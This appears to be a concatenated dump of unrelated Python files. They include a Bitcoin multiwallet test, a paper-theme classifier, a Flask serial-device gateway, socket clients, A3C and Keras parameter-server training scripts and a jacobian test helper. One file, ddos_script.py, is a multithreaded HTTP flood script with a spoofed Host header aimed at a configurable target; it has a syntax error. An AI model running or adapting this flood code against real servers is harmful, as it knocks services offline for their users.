exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0)
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
node.generatetoaddress(nblocks=101, address=w1.getnewaddress())
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2], ))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
if self.options.descriptors:
assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another bitcoind?", self.nodes[0].loadwallet, wallet_names[0])
else:
assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])
# This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
# Fail to load duplicate wallets by different ways (directory and filepath)
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
in_wallet_dir.append('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
assert_raises_rpc_error(-8, "RPC endpoint wallet and wallet_name parameter specify different wallets", w1.unloadwallet, "w2"),
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Unload w1 again, this time providing the wallet name twice
self.nodes[0].loadwallet("w1")
assert 'w1' in self.nodes[0].listwallets()
w1.unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
if os.path.exists(backup):
os.unlink(backup)
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
if self.options.descriptors:
assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
else:
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
|
k_means.py | import random
import time
from amr_categories.Animals import Animals
from amr_categories.CleanWater import CleanWater
from amr_categories.Environment import Environment
from amr_categories.FoodSafety import FoodSafety
from amr_categories.HumanConsumption import HumanConsumption
from amr_categories.HumanIPC import HumanIPC
from amr_categories.Plants import Plants
from amr_categories.RAndD import RAndD
from data.PaperCache import PaperCache
from multiprocessing import Process
def populate_parallel(pc, paper_id, themes_class_dict):
theme_dict = {'ipc': 0, 'consumption': 0, 'water': 0, 'environment': 0, 'food': 0, 'animals': 0,
'plants': 0, 'randd': 0}
for key in themes_class_dict.keys():
theme_dict.update({key: themes_class_dict.get(key).get_weighting_theme_from_paper_id(paper_id)})
sorted_themes = list(dict(sorted(theme_dict.items(), key=lambda x: x[1], reverse=True)).keys())
if int(paper_id) % 100 == 0:
print(paper_id)
primary_theme = sorted_themes[0]
secondary_theme = sorted_themes[1]
pc.update_theme(paper_id, primary_theme, secondary_theme)
def kth_nn(theme, pc):
theme.set_all_papers_primary_database()
all_papers = theme.all_papers
new_keywords = {}
for paper in all_papers:
keywords = pc.get_keywords_from_paper_id(paper.get('ID'))
for keyword in keywords:
if new_keywords.get(keyword.get('KEYWORD')) is None:
new_keywords.update({keyword.get('KEYWORD'): keyword.get('WEIGHT')})
else:
new_keywords.update({keyword.get('KEYWORD'): keyword.get('WEIGHT')
+ new_keywords.get(keyword.get('KEYWORD'))})
new_keywords = list(dict(sorted(new_keywords.items(), key=lambda x: x[1], reverse=True)).keys())[:100]
return new_keywords
def populate_theme():
pc = PaperCache()
all_papers = pc.get_all_papers()
themes = {'ipc': HumanIPC(), 'consumption': HumanConsumption(),
'water': CleanWater(), 'environment': Environment(),
'food': FoodSafety(), 'animals': Animals(), 'plants': Plants(),
'randd': RAndD()}
processes = []
index = 0
process_num = 40
prev_keywords = {k: themes.get(k).theme_keywords for k in themes.keys()}
print(prev_keywords)
new_keywords = {k: kth_nn(themes.get(k), pc) for k in themes.keys()}
for key in new_keywords.keys():
print(key)
print(new_keywords.get(key))
exit()
prev_time = [1000000]
start_time = time.time()
for paper in all_papers:
populate_parallel(pc, paper.get('ID'), themes)
p = Process(target=populate_parallel, args=(pc, paper.get('ID'), themes))
p.start()
processes.append(p)
index = index + 1
if index % process_num == 0:
index = 0
for process in processes:
process.join()
elapsed_time = time.time() - start_time
if float(elapsed_time) / float(process_num) <= min(prev_time) or random.randrange(0, 2) == 1:
process_num += 1
else:
process_num -= 1
prev_time = [min(prev_time), float(elapsed_time) / float(process_num)]
start_time = time.time()
print(process_num)
processes = []
populate_theme()
|
gateway.py |
#!/usr/bin/env python
from flask import Flask, render_template, Response, request
from flask_cors import CORS, cross_origin
from flask import json
import random
import serial_devices
import threading
import logging
# Raspberry Pi camera module (requires picamera package)
# from camera_pi import Camera
app = Flask(__name__)
CORS(app)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/devices')
def devices():
return json.jsonify(serial_devices.get_device_data())
@app.route('/send_signal')
def send_signal_to_device():
try:
device_id = request.args.get('id')
message = request.args.get('message')
serial_devices.send_signal(device_id, message)
return "Signal '%s' sent to %s" % (message, device_id)
except NameError as e:
return "No such devices specified"
@app.route('/add_device')
def add_device():
type = request.args.get('type', '')
if type in ['gyro','temp','pressure','led']:
serial_devices.add_device(type)
return "Device of %s created" % type
else:
return "Not a valid type", 404
if __name__ == '__main__':
th = threading.Thread(target=serial_devices.run_simulation)
th.daemon = True
th.start()
app.run(host='0.0.0.0', debug=True, threaded=True)
|
TCP_client.py | import socket
import time
import threading
import random
HOST = '127.0.0.1' # The server's hostname or IP address
PORT = 22244 # The port used by the server
server_addr = (HOST,PORT)
messages = [b'Message 1 from client.', b'Message 2 from client.',b'Message 3 from client.',b'KRAJ']
def spoji(tid):
print('starting connection to', server_addr)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time.sleep(tid)
sock.connect_ex(server_addr)
print('Thread', tid, 'otvorio:', sock.getsockname())
time.sleep(random.randint(1, 2))
print('sending', messages[0], 'to connection',
server_addr, ' fromthread: ', tid)
sock.send(messages[0])
time.sleep(random.randint(1, 2))
print('sending', messages[1], 'to connection',
server_addr, ' fromthread: ', tid)
sock.send(messages[1])
time.sleep(random.randint(1, 2))
print('sending', messages[2], 'to connection',
server_addr, ' fromthread: ', tid)
sock.send(messages[2])
time.sleep(random.randint(1, 2))
print('sending', messages[3], 'to connection',
server_addr, ' fromthread: ', tid)
sock.send(messages[3])
while True:
recv_data = sock.recv(1024) # Shouldbereadytoread
if recv_data:
print('received', repr(recv_data), 'to thread', tid)
if recv_data[len(recv_data)-4:] == b'KRAJ':
print('Završi thread', tid)
break
brojac = 1
tlista = []
while brojac < 3:
tlista.append(threading.Thread(target=spoji, args=(brojac,)))
tlista[len(tlista)-1].start()
brojac += 1
|
client_message.py | import threading
import socket
host = '127.0.0.1'
port = 55554
receive = False
message = ''
def start_chat():
nickname = "Text Holder"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
def receive():
while True:
try:
global message
message = client.recv(1024).decode('ascii')
if message == "NICK":
client.send(nickname.encode('ascii'))
else:
global receive
receive = True
except:
print("error occurred")
client.close()
break
def write():
while True:
message = f'{nickname}: {input("")}'
client.send(message.encode('ascii'))
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
|
main.py | from __future__ import print_function
import argparse
import os
import torch
import torch.multiprocessing as mp
import my_optim
from envs import create_atari_env
from model import ActorCritic
from test import test
from train import train
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument('--lr', type=float, default=0.0001,
help='learning rate (default: 0.0001)')
parser.add_argument('--gamma', type=float, default=0.99,
help='discount factor for rewards (default: 0.99)')
parser.add_argument('--gae-lambda', type=float, default=1.00,
help='lambda parameter for GAE (default: 1.00)')
parser.add_argument('--entropy-coef', type=float, default=0.01,
help='entropy term coefficient (default: 0.01)')
parser.add_argument('--value-loss-coef', type=float, default=0.5,
help='value loss coefficient (default: 0.5)')
parser.add_argument('--max-grad-norm', type=float, default=50,
help='value loss coefficient (default: 50)')
parser.add_argument('--seed', type=int, default=1,
help='random seed (default: 1)')
parser.add_argument('--num-processes', type=int, default=8,
help='how many training processes to use (default: 4)')
parser.add_argument('--num-steps', type=int, default=5,
help='number of forward steps in A3C (default: 20)')
parser.add_argument('--max-episode-length', type=int, default=1000000,
help='maximum length of an episode (default: 1000000)')
parser.add_argument('--env-name', default='PongDeterministic-v4',
help='environment to train on (default: PongDeterministic-v4)')
parser.add_argument('--no-shared', default=True,
help='use an optimizer without shared momentum.')
if __name__ == '__main__':
mp.set_start_method("spawn")
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['CUDA_VISIBLE_DEVICES'] = ""
args = parser.parse_args()
torch.manual_seed(args.seed)
env = create_atari_env(args.env_name)
shared_model = ActorCritic(
env.observation_space.shape[0], env.action_space)
shared_model.share_memory()
if args.no_shared:
optimizer = None
else:
optimizer = my_optim.SharedAdam(shared_model.parameters(), lr=args.lr)
optimizer.share_memory()
processes = []
counter = mp.Value('i', 0)
lock = mp.Lock()
p = mp.Process(target=test, args=(args.num_processes, args, shared_model, counter))
p.start()
processes.append(p)
for rank in range(0, args.num_processes):
p = mp.Process(target=train, args=(rank, args, shared_model, counter, lock, optimizer))
p.start()
processes.append(p)
for p in processes:
p.join()
|
abstract_jacobian_unit_test.py | '''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
mode: python; py-indent-offset: 4; tab-width: 4; coding: utf-8
'''
import unittest
from abc import ABC, abstractmethod
import inspect
import glob
from importlib import import_module
from os.path import join, basename, dirname
import os
from sos_trades_core.api import get_sos_logger
from multiprocessing import Process
from gemseo.core.discipline import MDODiscipline
PROCESS_IN_PARALLEL = 5
class AbstractJacobianUnittest(unittest.TestCase, ABC):
"""
unit test jacobian management implement
"""
DUMP_JACOBIAN = False
PICKLE_DIRECTORY = 'jacobian_pkls'
def generate_analytic_gradient_pickle(self, test_names=[]):
""" Main method to launch associated jacobian test and force dump of jacobian pickle
"""
local_logger = get_sos_logger('SoS.EE')
jacobian_test_entries = self.analytic_grad_entry()
for entry in jacobian_test_entries:
is_in_list = False
if len(test_names)>0:
for test_name in test_names:
if test_name in str(entry):
is_in_list=True
else:
is_in_list = True
if not is_in_list:
continue
try:
local_logger.info(
f'Jacobian launched on {str(entry)}')
self.setUp()
AbstractJacobianUnittest.DUMP_JACOBIAN = True
entry()
except Exception as ex:
local_logger.exception(
f'Jacobian fail on {str(entry)}')
@abstractmethod
def analytic_grad_entry(self):
""" Method to overload with jacobian test in order to be dump with the automated script
"""
raise TypeError('test_analytic_gradient must be overloaded')
def check_jacobian(self, location, filename, discipline, inputs, outputs, step=1e-15, derr_approx='complex_step', input_column=None, output_column=None, threshold=1e-8, parallel=False,
n_processes=5, linearization_mode='auto', directory=PICKLE_DIRECTORY):
""" Method that encapsulate check_jacobian call in order to witch between loading and dumping mode
"""
if n_processes > MDODiscipline.N_CPUS:
n_processes = MDODiscipline.N_CPUS
local_logger = get_sos_logger('SoS.EE')
file_path = join(location, directory,
filename)
if AbstractJacobianUnittest.DUMP_JACOBIAN:
local_logger.info(
f'Jacobian dump mode enable on {join(location, filename)}')
check_flag = discipline.check_jacobian(step=step, inputs=inputs,
outputs=outputs, derr_approx=derr_approx,
dump_jac_path=file_path, input_column=input_column, output_column=output_column, parallel=parallel,
n_processes=n_processes, linearization_mode=linearization_mode)
else:
check_flag = discipline.check_jacobian(step=step, inputs=inputs,
outputs=outputs, derr_approx=derr_approx,
load_jac_path=file_path, input_column=input_column, output_column=output_column, parallel=parallel,
n_processes=n_processes, linearization_mode=linearization_mode)
self.assertTrue(check_flag, msg=f"Wrong gradient in {discipline.get_disc_full_name()}")
@staticmethod
def launch_all_pickle_generation(root_module, file_regex='l1*.py', directories=[PICKLE_DIRECTORY], test_names=[]):
""" Static method that look for jacobian test to generate associated pickle (in the given folder)
and then push newly generated files into git repository
"""
root_dir = dirname(root_module.__file__)
local_logger = get_sos_logger('SoS.EE')
local_logger.info(
f'Looking for L1 tests into {root_dir}')
l1_list = glob.glob(
join(root_dir, file_regex))
local_logger.info(
f'found files {l1_list}')
process_list = []
for file in l1_list:
file_module = basename(file).replace('.py', '')
module_name = f'{root_module.__name__}.{file_module}'
try:
a = import_module(module_name)
for name, obj in inspect.getmembers(a):
if inspect.isclass(obj) and issubclass(obj, AbstractJacobianUnittest) and name != AbstractJacobianUnittest.__name__:
local_logger.info(
f'Execute jacobian dump on {module_name}')
inst = obj()
process_list.append(
Process(target=inst.generate_analytic_gradient_pickle(test_names=test_names)))
except Exception as ex:
local_logger.error(f'Error on module : {module_name}\n{ex}')
if len(process_list) > 0:
while len(process_list) > 0:
candidate_process = []
if len(process_list) > PROCESS_IN_PARALLEL:
candidate_process = [process_list.pop()
for index in range(PROCESS_IN_PARALLEL)]
else:
candidate_process = process_list
process_list = []
for process in candidate_process:
process.start()
for entry in candidate_process:
entry.join()
for directory in directories:
os.system(f'git add ./{directory}/*.pkl')
os.system(f'git commit -m "regeneration of jacobian pickles for {file_regex}"')
os.system('git pull')
os.system('git push')
else:
local_logger.warning('Nothing run so nothing to commit/push')
|
ddos_script.py | import socket
import threading as thr
# first the basic information
the_target = '127.0.0.1' # this is your local machine's ip(you can also put a domain name here) use only authorized servers to run this script
port = 80 # This is the http port, but you can also attack others like: smtp port 25, ftp port 21, ssh port 22 and so on..
hoax_ip = '182.88.100.56' # this is just some manufactured ip that is supposed to be a fake ip adress
# now let's define the ddos attack
def ddos():
while True: # endless loop
x = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # AF_INET is to create internet socket with ipv4 address socket, for ipv6 just put the 6 in the end, like this AF_INET6
# SOCK_STREAM is used to create a tcp socket
x.connect((the_target, port)) # connecting to it
x.sendto(("GET /" + the_target + " HTTP/1.1\r\n").encode("ascii"), (the_target, port))
x.sendto(("Host: " + hoax_ip + "r\n\r\n").encode("ascii), (the_target, port))
x.close()
# now let's thread through this
for i in range(4500): # the number is for multithread
thread = thr.Thread(target=ddos) # after the name target put the name of the function
thread.start()
|
keras_test_ssp.py | from __future__ import print_function
import keras
from keras.datasets import cifar10
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras.applications.resnet50 import ResNet50
from keras import backend as K
import os
import numpy as np
batch_size = 64
num_classes = 10
epochs = 100
Iterations = 64000
'''
save_dir = os.path.join(os.getcwd(), 'saved_models')
model_name = 'keras_cifar10_trained_model.h5'
'''
# The data, split between train and test sets:
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
'''
model = Sequential()
model.add(Conv2D(32, (3, 3), padding='same',
input_shape=x_train.shape[1:]))
model.add(Activation('relu'))
model.add(Conv2D(32, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(64, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(Conv2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(512))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes))
model.add(Activation('softmax'))
'''
base_model = ResNet50(include_top=False, weights=None,
input_shape=(32, 32, 3))
model = Sequential()
model.add(base_model)
model.add(keras.layers.Flatten())
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(128, activation='relu'))
model.add(keras.layers.Dropout(0.5))
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(64, activation='relu'))
model.add(keras.layers.Dropout(0.5))
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(10, activation='softmax'))
# model.summary()
# initiate RMSprop optimizer
opt = keras.optimizers.rmsprop(lr=0.0001, decay=1e-6)
# Let's train the model using RMSprop
model.compile(loss='categorical_crossentropy',
optimizer=opt,
metrics=['accuracy'])
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
datagen = ImageDataGenerator(
featurewise_center=False, # set input mean to 0 over the dataset
samplewise_center=False, # set each sample mean to 0
featurewise_std_normalization=False, # divide inputs by std of the dataset
samplewise_std_normalization=False, # divide each input by its std
zca_whitening=False, # apply ZCA whitening
zca_epsilon=1e-06, # epsilon for ZCA whitening
rotation_range=0, # randomly rotate images in the range (degrees, 0 to 180)
# randomly shift images horizontally (fraction of total width)
width_shift_range=0.1,
# randomly shift images vertically (fraction of total height)
height_shift_range=0.1,
shear_range=0., # set range for random shear
zoom_range=0., # set range for random zoom
channel_shift_range=0., # set range for random channel shifts
# set mode for filling points outside the input boundaries
fill_mode='nearest',
cval=0., # value used for fill_mode = "constant"
horizontal_flip=True, # randomly flip images
vertical_flip=False, # randomly flip images
# set rescaling factor (applied before any other transformation)
rescale=None,
# set function that will be applied on each input
preprocessing_function=None,
# image data format, either "channels_first" or "channels_last"
data_format=None,
# fraction of images reserved for validation (strictly between 0 and 1)
validation_split=0.0)
datagen.fit(x_train)
train_data = datagen.flow(x_train, y_train, batch_size=batch_size)
trainable_count = int(np.sum([K.count_params(p) for p in set(model.trainable_weights)]))
# print the trainable_weights
trainable_parameters = [K.eval(p) for p in set(model.trainable_weights)]
print(trainable_parameters[39])
for p in set(model.trainable_weights):
K.set_value(p, np.ones(p.shape))
trainable_parameters = [K.eval(p) for p in set(model.trainable_weights)]
print(trainable_parameters[39])
#
# trainable_parameters = [ for p in set(model.trainable_weights)]
# print(trainable_parameters)
# print(np.array(model.trainable_weights))
exit()
# design ps architecture
import sys
''' import fps package '''
import fps.wrapper as fps
from multiprocessing import Process
''' rewrite run.sh in it, using os.environ '''
num_servers = 1
num_workers = 2
if len(sys.argv) > 1:
num_servers = int(sys.argv[1])
if len(sys.argv) > 2:
num_servers = int(sys.argv[2])
os.environ['DMLC_NUM_SERVER'] = str(num_servers)
os.environ['DMLC_NUM_WORKER'] = str(num_workers)
os.environ['DMLC_PS_ROOT_URI'] = '127.0.0.1'
os.environ['DMLC_PS_ROOT_PORT'] = '8000'
os.environ['DMLC_NODE_HOST'] = '127.0.0.1'
os.environ['DMLC_NODE_VHOST'] = '127.0.0.1'
def install_scheduler(name):
print('Run scheduler task %s (%s)...' % (name, os.getpid()))
os.environ['DMLC_ROLE'] = 'scheduler'
c = fps.scheduler()
c.Init(0)
c.Finalize(0)
def install_server(name):
print('Run server task %s (%s)...' % (name, os.getpid()))
os.environ['DMLC_ROLE'] = 'server'
os.environ['HEAPPROFILE'] = './S' + str(name)
s = fps.server()
s.Init(0)
s.create(0)
s.start()
s.Finalize(0)
def install_worker(name):
print('Run worker task %s (%s)...' % (name, os.getpid()))
if name % 2 == 0:
os.environ['CUDA_VISIBLE_DEVICES'] = 0 # use 2080ti
else:
os.environ['CUDA_VISIBLE_DEVICES'] = 1 # use 2070
os.environ['DMLC_ROLE'] = 'worker'
os.environ['HEAPPROFILE'] = './W' + str(name)
w = fps.worker()
w.Init(0)
w.create(0, 0)
# w.start() we do not need to set slicer
'''
do somethings like push/pull
'''
iter = 0
# currently, only one server
keys = list(range(num_servers))
vals = []
lens = list(range(num_servers))
# get number of parameter
trainable_count = int(np.sum([K.count_params(p) for p in set(model.trainable_weights)]))
for i in range(num_servers):
lens[i] = trainable_count/num_servers
for x_train_, y_train_ in train_data:
if iter % 100 == 0:
print('The worker %s enter iteration %s' % (name, iter))
model.fit(x_train_, y_train_,
batch_size=batch_size,
validation_data=(x_test, y_test))
continue
model.fit(x_train_, y_train_,
batch_size=batch_size, verbose=0)
# write gradient to push
last = w.spush(keys, vals, iter, lens)
w.wait(w.spull(keys, iter))
# read parameter from pull, model.trainable_weights
ret = w.read()
iter = iter + 1
if iter >= Iterations:
break;
'''
# Save model and weights
if not os.path.isdir(save_dir):
os.makedirs(save_dir)
model_path = os.path.join(save_dir, model_name)
model.save(model_path)
print('Saved trained model at %s ' % model_path)
'''
w.wait(last)
w.wait(w.spull(keys, repeat - 1))
ret = w.read()
print(ret)
w.Finalize(0)
# Score trained model.
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
# num_processes = 1 + num_servers + num_workers
# _pool = Pool(processes=num_processes)
# ret_scheduler = []
# ret_server = []
# ret_worker = []
p_arr = []
for i in range(1):
p_arr.append(Process(target=install_scheduler, args=(i,)))
# ret_scheduler.append(_pool.apply_async(install_scheduler, args=(i,)))
for i in range(num_servers):
p_arr.append(Process(target=install_server, args=(i,)))
# ret_server.append(_pool.apply_async(install_server, args=(i,)))
for i in range(num_workers):
p_arr.append(Process(target=install_worker, args=(i,)))
# ret_worker.append(_pool.apply_async(install_worker, args=(i,)))
for p in p_arr:
p.start()
print('Waiting for all subprocesses done...')
for p in p_arr:
p.join()
# _pool.close()
# _pool.join()
print('Test SSP is done.')
# for result in (ret_scheduler+ret_server+ret_worker):
# print(result)
|
speicherung.py | import mysql.connector #Modul, dass es ermöglicht mit MySQL-Servern zu kommunizieren.
import time #Modul, zum warten im Programmcode und abrufen der aktuellen Systemzeit.
from threading import Thread #Wird dazu verwendet, Funktionen asyncron aufzurufen.
from ledController import farbeAnzeigen #Wird für die Ansteuerung der LED gebraucht.
benutzeLED = True #Gibt an, ob die LED beim Speicherb von Daten aufbliken soll.
mydb = None #Beinhaltet die Verbindung zum lokalen MySQL-Server.
#Stellt eine Verbindung zu den lokalen MySQL-Server her.
